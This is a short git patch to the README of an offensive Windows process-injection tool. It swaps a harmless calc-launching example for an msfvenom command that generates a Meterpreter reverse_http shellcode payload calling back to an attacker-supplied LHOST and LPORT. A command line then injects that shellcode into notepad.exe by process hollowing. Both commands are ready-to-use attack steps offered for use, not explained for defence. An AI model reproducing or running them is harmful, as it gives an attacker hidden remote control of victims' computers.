From 205ea2eb62c560e2ca5e179d75e4ebe934c91f19 Mon Sep 17 00:00:00 2001 From: r3nhat Date: Tue, 15 Oct 2019 11:57:03 -0700 Subject: [PATCH] Process Hollowing Technique Added --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ce00be4..d68427e 100644 --- a/README.md +++ b/README.md @@ -37,7 +37,7 @@ Currently the program accepts shellcode in 3 formats Process Hollowing Generating shellcode in c format and injecting it in the target process. - msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b ""\x00"" -f c + msfvenom -p windows/meterpreter/reverse_http exitfunc=thread LHOST=<> LPORT=<> -b "\x00" -f c ProcessInjection.exe /ppath:""C:\Windows\System32\notepad.exe"" /path:""C:\Users\User\Desktop\shellcode.txt"" /f:c /t:3